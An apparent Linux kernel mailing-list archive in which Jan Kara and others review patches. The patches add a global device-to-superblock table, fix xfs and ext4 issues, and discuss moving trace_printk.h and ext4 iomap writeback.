Hi!
On Tue 16-06-26 16:08:16, Christian Brauner wrote:
> This is a generalization of the device number to superblock so it works
> for actual block device and anonymous (or even mtd) devices.
>
> fs_holder_ops recovers the affected superblock from bdev->bd_holder. That
> forces the holder of a block device to be exactly one superblock and makes
> it impossible for several superblocks to share a single device.
>
> erofs does exactly that. It can mount read-only "blob" devices that are
> shared between many superblocks: a metadata-only erofs that indexes a set
> of per-layer blobs (one filesystem instead of one per OCI layer), or an
> incremental image whose base device is shared by several updates. Because
> the block layer only tracks a single holder, a freeze, thaw, removal or
> sync on such a device is never propagated to all the superblocks using it,
> and the current infrastructure has no way to find them.
>
> This series replaces the bd_holder-based lookup with a global, dev_t-keyed
> table mapping each block device to the superblock(s) using it. The holder
> argument becomes purely the block layer's exclusivity token -- a superblock,
> or the file_system_type for a device shared within one filesystem type --
> and the fs_holder_ops callbacks look the device up in the table and act on
> every superblock registered for it: 1:1 for most filesystems, 1:many for
> erofs.
So I was thinking about this also in the light of Christoph's complaints. I
agree with you, Chritian, that this translation table maintains the
abstraction of the holder - holder ops define how to transition from bdev
to its holder(s) and how to translate the .sync, .freeze and other
operations for the holders - and that is kept since your changes are
specific to fs_holder_ops.
What I'm wondering about a bit is whether we want this complexity for the
only user which is erofs (i.e., whether this wouldn't be better implemented
in erofs specific holder ops which could arguably be simpler than this
generic solution). On the other hand that will likely have to replicate
the locking dances we do in bdev_super_lock() and I'm not sure whether
spread of this locking complexity into filesystems is better than this
more complex VFS mapping code.
One more thing I was considering is that the need to transition from one
bdev to multiple holders isn't actually unique to erofs. For example device
mapper will need the same thing, arguably partition bdevs could be also
made holders of the complete bdev so events are propagated from the whole
bdev into partition bdevs properly (which currently happens in kind of ad
hoc manner and only in some cases). Currently your translation mechanism is
tied to mapping to superblock but actually rather weakly - we only need the
guarantee that the holder stays alive while the mapping entry exists, the
rest is protected by the mapping entry refcount AFAICS. So with a bit of
effort we could make this a generic bdev -> holders mapping mechanism
usable from whichever holder ops decide to employ it, which would then be
quite attractive IMO.
But I guess let's leave lifting the mapping code from super.c and
converting it into generic mapping mechanism for the moment when we really
get into implementing another user.
All this is a long way of saying that I'm OK with the mapping mechanism
like this :).
Honza
> Filesystems claim and release their devices through new
> fs_bdev_file_open_by_{dev,path}() and fs_bdev_file_release() helpers; the
> per-fs patches convert xfs, btrfs, ext4, f2fs and erofs over to them and
> fix cramfs and romfs, which released the registered main device with a
> raw bdev_fput().
>
> Since every superblock is registered under its s_dev the table also
> replaces the last s_dev-keyed walk of the super_blocks list:
> user_get_super() resolves device numbers through it, so ustat() and
> quotactl() now work on any device a filesystem claims and no longer
> take sb_lock.
>
> The longer-term motivation is to let userspace decide which devices may be
> onlined from one central place, without having to teach every filesystem
> about it individually.
>
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>
> ---
> Changes in v2:
> - super: rework the device-to-superblock table reference counting: each
> (device, superblock) entry carries a single claim count and holds one
> passive reference on its superblock for the entry's lifetime. New prep
> patches convert s_count to refcount_t s_passive and make put_super()
> self-locking.
> - super: preallocate the entry in alloc_super() and register it from the
> set callbacks through set_anon_super()/set_bdev_super(); an insert
> failure unwinds exactly like a set callback failure. The superblock
> stashes the entry in sb->s_super_dev and kill_super_notify() drops the
> claim through it.
> - super: initialize the table from mnt_init(); the rootfs and shm mounts
> are created long before any initcall runs.
> - super: fold the v1 "refuse to claim a frozen block device" patch into
> the registration helper and restore the EBUSY check for the primary
> device in setup_bdev_super(): additional devices (the xfs log, the ext4
> journal, erofs blobs) are now refused while frozen as well, answering
> Jan's question on v1 3/8.
> - Split the core patch into table/helpers/switch-over and move the
> xfs/btrfs/ext4 conversions before the fs_holder_ops switch so no
> freeze/mark_dead events are lost mid-series; erofs follows the switch.
> - New prep patches: the ext4 KUnit tests allocate anonymous devices and
> ocfs2 stops resetting s_dev on dismount.
> - New: convert user_get_super() to the device table, plus a ustat()
> selftest.
> - New: fix a pre-existing double release of the realtime device file and
> dangling buftarg pointers in xfs_open_devices()'s error unwind.
> - New: convert f2fs's additional devices to the helpers; fix cramfs and
> romfs releasing the registered main device with a raw bdev_fput().
> - erofs: drop the .shutdown() and .remove_bdev() implementations and the
> per-device "dead" flag. Immutable filesystems don't need them: the block
> layer sets GD_DEAD before fs_bdev_mark_dead() so in-flight bios fail
> anyway, erofs has no write path or journal to stop, and the read-only
> loop_change_fd() case must not be forced to -EIO. Patch from Gao Xiang,
> applied verbatim - thanks!
> - btrfs: fix a general protection fault in close_fs_devices() on a failed
> mount (reported by syzbot). The release path took the superblock from
> device->fs_info, which is still NULL if open_ctree() fails before
> btrfs_init_devices_late(); it now uses bdev_file->private_data.
> - erofs: the v1 conversion was sent with a generic boilerplate changelog;
> superseded by Gao's patch above.
> - Collect Reviewed-by from Jan Kara and Tested-by from syzbot.
> - Rebase onto v7.1-rc1.
> - Link to v1: https://patch.msgid.link/20260602-work-super-bdev_holder_global-v1-0-bb0fd82f3861@kernel.org
>
> ---
> Christian Brauner (18):
> xfs: fix the error unwind in xfs_open_devices()
> super: convert s_count to refcount_t s_passive
> super: take lock after last reference count
> fs, block: move blk_mode_t and fop_flags_t into <linux/types.h>
> ext4: use anonymous devices for KUnit test superblocks
> ocfs2: don't reset s_dev on dismount
> fs: maintain a global device-to-superblock table
> fs: add dedicated block device open helpers for filesystems
> xfs: port to fs_bdev_file_open_by_path()
> btrfs: open via dedicated fs bdev helpers
> ext4: open via dedicated fs bdev helpers
> fs: look up superblocks via the device table in fs_holder_ops
> fs: tolerate per-superblock freeze errors on shared devices
> erofs: open via dedicated fs bdev helpers
> f2fs: open via dedicated fs bdev helpers
> super: make fs_holder_ops private
> fs: look up the superblock via the device table in user_get_super()
> selftests/filesystems: add ustat() coverage
>
> fs/btrfs/volumes.c | 31 +-
> fs/cramfs/inode.c | 2 +-
> fs/erofs/super.c | 35 +-
> fs/ext4/extents-test.c | 9 +-
> fs/ext4/mballoc-test.c | 9 +-
> fs/ext4/super.c | 12 +-
> fs/f2fs/super.c | 6 +-
> fs/internal.h | 1 +
> fs/namespace.c | 2 +
> fs/ocfs2/super.c | 1 -
> fs/romfs/super.c | 2 +-
> fs/super.c | 620 ++++++++++++++++-------
> fs/xfs/xfs_buf.c | 2 +-
> fs/xfs/xfs_super.c | 13 +-
> include/linux/blkdev.h | 9 -
> include/linux/fs.h | 2 -
> include/linux/fs/super.h | 8 +
> include/linux/fs/super_types.h | 4 +-
> include/linux/types.h | 2 +
> tools/testing/selftests/filesystems/.gitignore | 1 +
> tools/testing/selftests/filesystems/Makefile | 2 +-
> tools/testing/selftests/filesystems/ustat_test.c | 135 +++++
> 22 files changed, 647 insertions(+), 261 deletions(-)
> ---
> base-commit: 0c0d974f62e6603d4514e1a8035658edb353c68f
> change-id: 20260602-work-super-bdev_holder_global-8cba5e52bed5
>
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH RFC v2 03/18] super: take lock after last reference count
From: Jan Kara @ 2026-06-22 13:50 UTC (permalink / raw)
To: Christian Brauner
Cc: Jan Kara, Christoph Hellwig, Jens Axboe, Alexander Viro,
linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
linux-xfs, Chris Mason, David Sterba, linux-btrfs,
Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260616-work-super-bdev_holder_global-v2-3-7df6b864028e@kernel.org>
On Tue 16-06-26 16:08:19, Christian Brauner wrote:
> __put_super() required the caller to hold sb_lock, so put_super()
> wrapped it. The per-device superblock table introduced later drops its
> passive references from contexts that do not hold sb_lock, so make
> put_super() self-locking: drop the count first and take sb_lock only for
> the final list_del.
>
> With the count now dropped outside sb_lock a superblock can briefly sit
> on @super_blocks with s_passive == 0 before it is unlinked, so the list
> walkers (__iterate_supers(), iterate_supers_type(), user_get_super())
> switch to refcount_inc_not_zero() and skip it.
>
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>
Looks good, just one style nit below. Feel free to add:
Reviewed-by: Jan Kara <jack@suse.cz>
> -static void __put_super(struct super_block *s)
> +void put_super(struct super_block *s)
> {
> if (refcount_dec_and_test(&s->s_passive)) {
> +
I'd delete this empty line.
> + spin_lock(&sb_lock);
> list_del_init(&s->s_list);
> + spin_unlock(&sb_lock);
> +
Honza
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH RFC v2 02/18] super: convert s_count to refcount_t s_passive
From: Jan Kara @ 2026-06-22 13:48 UTC (permalink / raw)
To: Christian Brauner
Cc: Jan Kara, Christoph Hellwig, Jens Axboe, Alexander Viro,
linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
linux-xfs, Chris Mason, David Sterba, linux-btrfs,
Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260616-work-super-bdev_holder_global-v2-2-7df6b864028e@kernel.org>
On Tue 16-06-26 16:08:18, Christian Brauner wrote:
> The superblock carries two counters: s_active, the active reference
> count that keeps the filesystem usable, and s_count, the passive
> reference count that merely keeps the structure itself alive. Turn the
> passive count into a refcount_t and rename it to s_passive to make the
> pairing with s_active obvious.
>
> Everything is still serialized by sb_lock, so there is no functional
> change; the conversion buys the usual refcount_t saturation and
> underflow checking. The following patches start dropping passive
> references without holding sb_lock and make the device-to-superblock
> table hold one passive reference per registered entry, which a plain
> integer cannot support.
>
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>
Yeah, looks like a reasonable cleanup. Feel free to add:
Reviewed-by: Jan Kara <jack@suse.cz>
Honza
> ---
> fs/super.c | 18 +++++++++---------
> include/linux/fs/super_types.h | 2 +-
> 2 files changed, 10 insertions(+), 10 deletions(-)
>
> diff --git a/fs/super.c b/fs/super.c
> index a8fd61136aaf..25dd72b550e0 100644
> --- a/fs/super.c
> +++ b/fs/super.c
> @@ -102,7 +102,7 @@ static bool super_flags(const struct super_block *sb, unsigned int flags)
> * creation will succeed and SB_BORN is set by vfs_get_tree() or we're
> * woken and we'll see SB_DYING.
> *
> - * The caller must have acquired a temporary reference on @sb->s_count.
> + * The caller must have acquired a temporary reference on @sb->s_passive.
> *
> * Return: The function returns true if SB_BORN was set and with
> * s_umount held. The function returns false if SB_DYING was
> @@ -367,7 +367,7 @@ static struct super_block *alloc_super(struct file_system_type *type, int flags,
> spin_lock_init(&s->s_inode_wblist_lock);
> fserror_mount(s);
>
> - s->s_count = 1;
> + refcount_set(&s->s_passive, 1);
> atomic_set(&s->s_active, 1);
> mutex_init(&s->s_vfs_rename_mutex);
> lockdep_set_class(&s->s_vfs_rename_mutex, &type->s_vfs_rename_key);
> @@ -407,7 +407,7 @@ static struct super_block *alloc_super(struct file_system_type *type, int flags,
> */
> static void __put_super(struct super_block *s)
> {
> - if (!--s->s_count) {
> + if (refcount_dec_and_test(&s->s_passive)) {
> list_del_init(&s->s_list);
> WARN_ON(s->s_dentry_lru.node);
> WARN_ON(s->s_inode_lru.node);
> @@ -529,7 +529,7 @@ static bool grab_super(struct super_block *sb)
> {
> bool locked;
>
> - sb->s_count++;
> + refcount_inc(&sb->s_passive);
> spin_unlock(&sb_lock);
> locked = super_lock_excl(sb);
> if (locked) {
> @@ -556,7 +556,7 @@ static bool grab_super(struct super_block *sb)
> * lock held in read mode in case of success. On successful return,
> * the caller must drop the s_umount lock when done.
> *
> - * Note that unlike get_super() et.al. this one does *not* bump ->s_count.
> + * Note that unlike get_super() et.al. this one does *not* bump ->s_passive.
> * The reason why it's safe is that we are OK with doing trylock instead
> * of down_read(). There's a couple of places that are OK with that, but
> * it's very much not a general-purpose interface.
> @@ -858,7 +858,7 @@ static void __iterate_supers(void (*f)(struct super_block *, void *), void *arg,
> sb = next_super(sb, flags)) {
> if (super_flags(sb, SB_DYING))
> continue;
> - sb->s_count++;
> + refcount_inc(&sb->s_passive);
> spin_unlock(&sb_lock);
>
> if (flags & SUPER_ITER_UNLOCKED) {
> @@ -903,7 +903,7 @@ void iterate_supers_type(struct file_system_type *type,
> if (super_flags(sb, SB_DYING))
> continue;
>
> - sb->s_count++;
> + refcount_inc(&sb->s_passive);
> spin_unlock(&sb_lock);
>
> locked = super_lock_shared(sb);
> @@ -935,7 +935,7 @@ struct super_block *user_get_super(dev_t dev, bool excl)
> if (sb->s_dev != dev)
> continue;
>
> - sb->s_count++;
> + refcount_inc(&sb->s_passive);
> spin_unlock(&sb_lock);
>
> locked = super_lock(sb, excl);
> @@ -1369,7 +1369,7 @@ static struct super_block *bdev_super_lock(struct block_device *bdev, bool excl)
>
> /* Make sure sb doesn't go away from under us */
> spin_lock(&sb_lock);
> - sb->s_count++;
> + refcount_inc(&sb->s_passive);
> spin_unlock(&sb_lock);
>
> mutex_unlock(&bdev->bd_holder_lock);
> diff --git a/include/linux/fs/super_types.h b/include/linux/fs/super_types.h
> index ef7941e9dc79..68747182abf9 100644
> --- a/include/linux/fs/super_types.h
> +++ b/include/linux/fs/super_types.h
> @@ -145,7 +145,7 @@ struct super_block {
> unsigned long s_magic;
> struct dentry *s_root;
> struct rw_semaphore s_umount;
> - int s_count;
> + refcount_t s_passive;
> atomic_t s_active;
> #ifdef CONFIG_SECURITY
> void *s_security;
>
> --
> 2.47.3
>
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH RFC v2 05/18] ext4: use anonymous devices for KUnit test superblocks
From: Jan Kara @ 2026-06-22 13:48 UTC (permalink / raw)
To: Christian Brauner
Cc: Jan Kara, Christoph Hellwig, Jens Axboe, Alexander Viro,
linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
linux-xfs, Chris Mason, David Sterba, linux-btrfs,
Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260616-work-super-bdev_holder_global-v2-5-7df6b864028e@kernel.org>
On Tue 16-06-26 16:08:21, Christian Brauner wrote:
> The mballoc and extents KUnit tests create superblocks through
> sget_fc() with a set callback that never assigns s_dev and a kill_sb
> that only calls generic_shutdown_super().
>
> The upcoming global device-to-superblock table registers every
> superblock under its s_dev, so each superblock needs a unique device
> number. Allocate a proper anonymous device via set_anon_super_fc() and
> release it through kill_anon_super().
>
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>
Ok. Feel free to add:
Reviewed-by: Jan Kara <jack@suse.cz>
Honza
> ---
> fs/ext4/extents-test.c | 9 ++-------
> fs/ext4/mballoc-test.c | 9 ++-------
> 2 files changed, 4 insertions(+), 14 deletions(-)
>
> diff --git a/fs/ext4/extents-test.c b/fs/ext4/extents-test.c
> index bd7795a82607..c3836ecb89f9 100644
> --- a/fs/ext4/extents-test.c
> +++ b/fs/ext4/extents-test.c
> @@ -126,11 +126,6 @@ struct kunit_ext_test_param {
> struct kunit_ext_data_state exp_data_state[3];
> };
>
> -static void ext_kill_sb(struct super_block *sb)
> -{
> - generic_shutdown_super(sb);
> -}
> -
> static int ext_init_fs_context(struct fs_context *fc)
> {
> return 0;
> @@ -138,13 +133,13 @@ static int ext_init_fs_context(struct fs_context *fc)
>
> static int ext_set(struct super_block *sb, struct fs_context *fc)
> {
> - return 0;
> + return set_anon_super_fc(sb, fc);
> }
>
> static struct file_system_type ext_fs_type = {
> .name = "extents test",
> .init_fs_context = ext_init_fs_context,
> - .kill_sb = ext_kill_sb,
> + .kill_sb = kill_anon_super,
> };
>
> static void extents_kunit_exit(struct kunit *test)
> diff --git a/fs/ext4/mballoc-test.c b/fs/ext4/mballoc-test.c
> index d90da44aadbd..a3b33ed2c172 100644
> --- a/fs/ext4/mballoc-test.c
> +++ b/fs/ext4/mballoc-test.c
> @@ -59,11 +59,6 @@ static const struct super_operations mbt_sops = {
> .free_inode = mbt_free_inode,
> };
>
> -static void mbt_kill_sb(struct super_block *sb)
> -{
> - generic_shutdown_super(sb);
> -}
> -
> static int mbt_init_fs_context(struct fs_context *fc)
> {
> return 0;
> @@ -72,7 +67,7 @@ static int mbt_init_fs_context(struct fs_context *fc)
> static struct file_system_type mbt_fs_type = {
> .name = "mballoc test",
> .init_fs_context = mbt_init_fs_context,
> - .kill_sb = mbt_kill_sb,
> + .kill_sb = kill_anon_super,
> };
>
> static int mbt_mb_init(struct super_block *sb)
> @@ -136,7 +131,7 @@ static void mbt_mb_release(struct super_block *sb)
>
> static int mbt_set(struct super_block *sb, struct fs_context *fc)
> {
> - return 0;
> + return set_anon_super_fc(sb, fc);
> }
>
> static struct super_block *mbt_ext4_alloc_super_block(void)
>
> --
> 2.47.3
>
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH RFC v2 01/18] xfs: fix the error unwind in xfs_open_devices()
From: Jan Kara @ 2026-06-22 13:35 UTC (permalink / raw)
To: Christian Brauner
Cc: Jan Kara, Christoph Hellwig, Jens Axboe, Alexander Viro,
linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
linux-xfs, Chris Mason, David Sterba, linux-btrfs,
Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260616-work-super-bdev_holder_global-v2-1-7df6b864028e@kernel.org>
On Tue 16-06-26 16:08:17, Christian Brauner wrote:
> Since the rt and log block devices are closed in xfs_free_buftarg() the
> buftarg owns the device file. The error unwind does not respect that:
> when the log buftarg allocation fails, out_free_rtdev_targ frees the rt
> buftarg - releasing rtdev_file - and then falls through to
> out_close_rtdev and releases it a second time.
>
> The unwind also leaves mp->m_rtdev_targp and mp->m_ddev_targp pointing
> to the freed buftargs. The failed mount continues into
> deactivate_locked_super() -> xfs_kill_sb() -> xfs_mount_free(), which
> frees them again.
>
> Clear the buftarg pointers once the unwind freed them and clear
> rtdev_file once the rt buftarg owns it, so nothing is released twice.
>
> Reachable when a buftarg allocation fails after the data buftarg was
> set up: an I/O error in sync_blockdev() or an allocation failure in
> xfs_init_buftarg() while mounting with external rt and log devices.
>
> Fixes: 41233576e9a4 ("xfs: close the RT and log block devices in xfs_free_buftarg")
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>
Looks good to me. As a small nit I'd probably do rtdev_file = NULL just
after we've successfully allocated m_rtdev_targp but that's really minor.
Feel free to add:
Reviewed-by: Jan Kara <jack@suse.cz>
Honza
> ---
> fs/xfs/xfs_super.c | 3 +++
> 1 file changed, 3 insertions(+)
>
> diff --git a/fs/xfs/xfs_super.c b/fs/xfs/xfs_super.c
> index eac7f9503805..8531d526fc44 100644
> --- a/fs/xfs/xfs_super.c
> +++ b/fs/xfs/xfs_super.c
> @@ -534,8 +534,11 @@ xfs_open_devices(
> out_free_rtdev_targ:
> if (mp->m_rtdev_targp)
> xfs_free_buftarg(mp->m_rtdev_targp);
> + mp->m_rtdev_targp = NULL;
> + rtdev_file = NULL; /* released by xfs_free_buftarg() */
> out_free_ddev_targ:
> xfs_free_buftarg(mp->m_ddev_targp);
> + mp->m_ddev_targp = NULL;
> out_close_rtdev:
> if (rtdev_file)
> bdev_fput(rtdev_file);
>
> --
> 2.47.3
>
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH 0/2] tracing: Move trace_printk.h out of kernel.h
From: Yury Norov @ 2026-06-22 13:11 UTC (permalink / raw)
To: Steven Rostedt
Cc: Christophe Leroy (CS GROUP), linux-kernel, linux-trace-kernel,
Masami Hiramatsu, Mark Rutland, Mathieu Desnoyers, Andrew Morton,
Linus Torvalds, Sebastian Andrzej Siewior, John Ogness,
Thomas Gleixner, Peter Zijlstra, Julia Lawall, Yury Norov,
linux-doc, linux-kbuild, linuxppc-dev, dri-devel, linux-stm32,
linux-arm-kernel, linux-rdma, linux-usb, linux-ext4, linux-nfs,
kvm, intel-gfx
In-Reply-To: <20260622090826.20efadb3@fedora>
On Mon, Jun 22, 2026 at 09:08:26AM -0400, Steven Rostedt wrote:
> On Mon, 22 Jun 2026 10:05:13 +0200
> "Christophe Leroy (CS GROUP)" <chleroy@kernel.org> wrote:
>
> > > There's been complaints about trace_printk() being defined in kernel.h as it
> > > can increase the compilation time. As it is only used by some developers for
> > > debugging purposes, it should not be in kernel.h causing lots of wasted CPU
> > > cycles for those that do not ever care about it.
> >
> > Do we have a measurement of the increased compilation time ?
>
> I believe Yury does.
I re-run compilation is a more strict environment, and the difference
is negligible.
^ permalink raw reply
* Re: [PATCH 0/2] tracing: Move trace_printk.h out of kernel.h
From: Steven Rostedt @ 2026-06-22 13:08 UTC (permalink / raw)
To: Christophe Leroy (CS GROUP)
Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
Peter Zijlstra, Julia Lawall, Yury Norov, linux-doc, linux-kbuild,
linuxppc-dev, dri-devel, linux-stm32, linux-arm-kernel,
linux-rdma, linux-usb, linux-ext4, linux-nfs, kvm, intel-gfx
In-Reply-To: <dbb5915e-6587-4de9-87f3-76bea5024da8@kernel.org>
On Mon, 22 Jun 2026 10:05:13 +0200
"Christophe Leroy (CS GROUP)" <chleroy@kernel.org> wrote:
> > There's been complaints about trace_printk() being defined in kernel.h as it
> > can increase the compilation time. As it is only used by some developers for
> > debugging purposes, it should not be in kernel.h causing lots of wasted CPU
> > cycles for those that do not ever care about it.
>
> Do we have a measurement of the increased compilation time ?
I believe Yury does.
-- Steve
^ permalink raw reply
* Re: [PATCH v4 09/23] ext4: implement writeback path using iomap
From: Zhang Yi @ 2026-06-22 12:36 UTC (permalink / raw)
To: Jan Kara, Zhang Yi
Cc: linux-ext4, linux-fsdevel, linux-kernel, tytso, adilger.kernel,
libaokun, ojaswin, ritesh.list, djwong, hch, yi.zhang, yangerkun,
yukuai
In-Reply-To: <jxlc26s4ez5mug27innhntsubeddyishy7wlz6nv6dfugvz7c3@ztgmhhe2333m>
On 6/16/2026 7:47 PM, Jan Kara wrote:
> On Mon 11-05-26 15:23:29, Zhang Yi wrote:
>> From: Zhang Yi <yi.zhang@huawei.com>
>>
>> Add the iomap writeback path for ext4 buffered I/O. This introduces:
>>
>> - ext4_iomap_writepages(): the main writeback entry point.
>> - ext4_writeback_ops: a new iomap_writeback_ops instance to handle
>> block mapping and I/O submission.
>> - A new end I/O worker for converting unwritten extents, updating file
>> size, and handling DATA_ERR_ABORT after I/O completion.
>>
>> Core implementation details:
>>
>> - ->writeback_range() callback
>> Calls ext4_iomap_map_writeback_range() to query the longest range of
>> existing mapped extents. For performance, when a block range is not
>> yet allocated, it allocates based on the writeback length and delalloc
>> extent length, rather than allocating for a single folio at a time.
>> The folio is then added to an iomap_ioend instance.
>>
>> - ->writeback_submit() callback
>> Registers ext4_iomap_end_bio() as the end bio callback. This callback
>> schedules a worker to handle:
>> - Unwritten extent conversion.
>> - i_disksize update after data is written back.
>> - Journal abort on writeback I/O failure.
>>
>> Key changes and considerations:
>>
>> - Append write and unwritten extents
>> Since data=ordered mode is not used to prevent stale data exposure
>> during append writebacks, new blocks are always allocated as unwritten
>> extents (i.e. always enable dioread_nolock), and i_disksize update is
>> postponed until I/O completion. Additionally, the deadlock that the
>> reserve handle was expected to resolve does not occur anymore.
>> Therefore, the end I/O worker can start a normal journal handle
>> instead of a reserve handle when converting unwritten extents.
>>
>> - Lock ordering
>> The ->writeback_range() callback runs under the folio lock, requiring
>> the journal handle to be started under that same lock. This reverses
>> the order compared to the buffer_head writeback path. The lock ordering
>> documentation in super.c has been updated accordingly.
>>
>> Signed-off-by: Zhang Yi <yi.zhang@huawei.com>
>> ---
>> fs/ext4/ext4.h | 4 +
>> fs/ext4/inode.c | 208 +++++++++++++++++++++++++++++++++++++++++-
>> fs/ext4/page-io.c | 126 +++++++++++++++++++++++++
>> fs/ext4/super.c | 7 +-
>> fs/iomap/ioend.c | 3 +-
>> include/linux/iomap.h | 1 +
>> 6 files changed, 346 insertions(+), 3 deletions(-)
>>
>> diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
>> index 4832e7f7db82..078feda47e36 100644
>> --- a/fs/ext4/ext4.h
>> +++ b/fs/ext4/ext4.h
>> @@ -1173,6 +1173,8 @@ struct ext4_inode_info {
>> */
>> struct list_head i_rsv_conversion_list;
>> struct work_struct i_rsv_conversion_work;
>> + struct list_head i_iomap_ioend_list;
>> + struct work_struct i_iomap_ioend_work;
>
> Ugh, this adds 48 bytes to ext4 inode. That's pretty heavy. Cannot we reuse
> i_rsv_conversion_list / work for this? For each inode only one of them
> should be used AFAICS.
Thanks for your suggestion. I think we should be able to reuse
i_rsv_conversion_list / work. We can choose the corresponding
initialization function for i_rsv_conversion_work based on the buffered
write path at initialization time, and then reinitialize the work
handler when changing the path via the ioctl that sets the journal
flag. That should be sufficient.
>
>> diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
>> index 1ae7d3f4a1c8..a80195bd6f20 100644
>> --- a/fs/ext4/inode.c
>> +++ b/fs/ext4/inode.c
>> @@ -44,6 +44,7 @@
>> #include <linux/iversion.h>
>>
>> #include "ext4_jbd2.h"
>> +#include "ext4_extents.h"
>> #include "xattr.h"
>> #include "acl.h"
>> #include "truncate.h"
>> @@ -4120,10 +4121,215 @@ static void ext4_iomap_readahead(struct readahead_control *rac)
>> iomap_bio_readahead(rac, &ext4_iomap_buffered_read_ops);
>> }
>>
>> +static int ext4_iomap_map_one_extent(struct inode *inode,
>> + struct ext4_map_blocks *map)
>> +{
>> + struct extent_status es;
>> + handle_t *handle = NULL;
>> + int credits, map_flags;
>> + int retval;
>> +
>> + credits = ext4_chunk_trans_blocks(inode, map->m_len);
>> + handle = ext4_journal_start(inode, EXT4_HT_WRITE_PAGE, credits);
>> + if (IS_ERR(handle))
>> + return PTR_ERR(handle);
>> +
>> + map->m_flags = 0;
>> + /*
>> + * It is necessary to look up extent and map blocks under i_data_sem
>> + * in write mode, otherwise, the delalloc extent may become stale
>> + * during concurrent truncate operations.
>> + */
>> + ext4_fc_track_inode(handle, inode);
>> + down_write(&EXT4_I(inode)->i_data_sem);
>> + if (ext4_es_lookup_extent(inode, map->m_lblk, NULL, &es, &map->m_seq)) {
>> + retval = es.es_len - (map->m_lblk - es.es_lblk);
>> + map->m_len = min_t(unsigned int, retval, map->m_len);
>> +
>> + if (ext4_es_is_delayed(&es)) {
>> + map->m_flags |= EXT4_MAP_DELAYED;
>> + trace_ext4_da_write_pages_extent(inode, map);
>> + /*
>> + * Call ext4_map_create_blocks() to allocate any
>> + * delayed allocation blocks. It is possible that
>> + * we're going to need more metadata blocks, however
>> + * we must not fail because we're in writeback and
>> + * there is nothing we can do so it might result in
>> + * data loss. So use reserved blocks to allocate
>> + * metadata if possible.
>> + */
>> + map_flags = EXT4_GET_BLOCKS_CREATE_UNWRIT_EXT |
>> + EXT4_GET_BLOCKS_METADATA_NOFAIL |
>> + EXT4_EX_NOCACHE;
>> +
>> + retval = ext4_map_create_blocks(handle, inode, map,
>> + map_flags);
>> + if (retval > 0)
>> + ext4_fc_track_range(handle, inode, map->m_lblk,
>> + map->m_lblk + map->m_len - 1);
>> + goto out;
>> + } else if (unlikely(ext4_es_is_hole(&es)))
>> + goto out;
>> +
>> + /* Found written or unwritten extent. */
>> + map->m_pblk = ext4_es_pblock(&es) + map->m_lblk - es.es_lblk;
>> + map->m_flags = ext4_es_is_written(&es) ?
>> + EXT4_MAP_MAPPED : EXT4_MAP_UNWRITTEN;
>> + goto out;
>> + }
>> +
>> + retval = ext4_map_query_blocks(handle, inode, map, EXT4_EX_NOCACHE);
>> +out:
>> + up_write(&EXT4_I(inode)->i_data_sem);
>> + ext4_journal_stop(handle);
>> + return retval < 0 ? retval : 0;
>> +}
>> +
>> +static int ext4_iomap_map_writeback_range(struct iomap_writepage_ctx *wpc,
>> + loff_t offset, unsigned int dirty_len)
>> +{
>> + struct inode *inode = wpc->inode;
>> + struct super_block *sb = inode->i_sb;
>> + struct journal_s *journal = EXT4_SB(sb)->s_journal;
>> + struct ext4_map_blocks map;
>> + unsigned int blkbits = inode->i_blkbits;
>> + unsigned int index = offset >> blkbits;
>> + unsigned int blk_end, blk_len;
>> + int ret;
>> +
>> + ret = ext4_emergency_state(sb);
>> + if (unlikely(ret))
>> + return ret;
>> +
>> + /* Check validity of the cached writeback mapping. */
>> + if (offset >= wpc->iomap.offset &&
>> + offset < wpc->iomap.offset + wpc->iomap.length &&
>> + ext4_iomap_valid(inode, &wpc->iomap))
>> + return 0;
>> +
>> + blk_len = dirty_len >> blkbits;
>> + blk_end = min_t(unsigned int, (wpc->wbc->range_end >> blkbits),
>> + (UINT_MAX - 1));
>> + if (blk_end > index + blk_len)
>> + blk_len = blk_end - index + 1;
>> +
>> +retry:
>> + map.m_lblk = index;
>> + map.m_len = min_t(unsigned int, MAX_WRITEPAGES_EXTENT_LEN, blk_len);
>> + ret = ext4_map_blocks(NULL, inode, &map,
>> + EXT4_GET_BLOCKS_IO_SUBMIT | EXT4_EX_NOCACHE);
>> + if (ret < 0)
>> + return ret;
>> +
>> + /*
>> + * The map is not a delalloc extent, it must either be a hole
>> + * or an extent which have already been allocated.
>> + */
>> + if (!(map.m_flags & EXT4_MAP_DELAYED))
>> + goto out;
>> +
>> + /* Map one delalloc extent. */
>> + ret = ext4_iomap_map_one_extent(inode, &map);
>
> So it looks somewhat strange that here we call ext4_map_blocks() (which
> consults extent status tree and then possibly on-disk extent tree) and then
> we call ext4_iomap_map_one_extent() which manipulates with the extent
> status tree and possibly extent tree as well. Is all this complexity to
> avoid starting a jbd2 handle unless really needed? If yes, is that really
> worth it? Given iomap code caches the extent we'd start the transaction
> only once per mapped extent which shouldn't be that bad?
>
> If you have some benchmark showing this is really worth it,
Thanks for your suggestion. I think we should be able to reuse
i_rsv_conversion_list / work. We can choose the corresponding
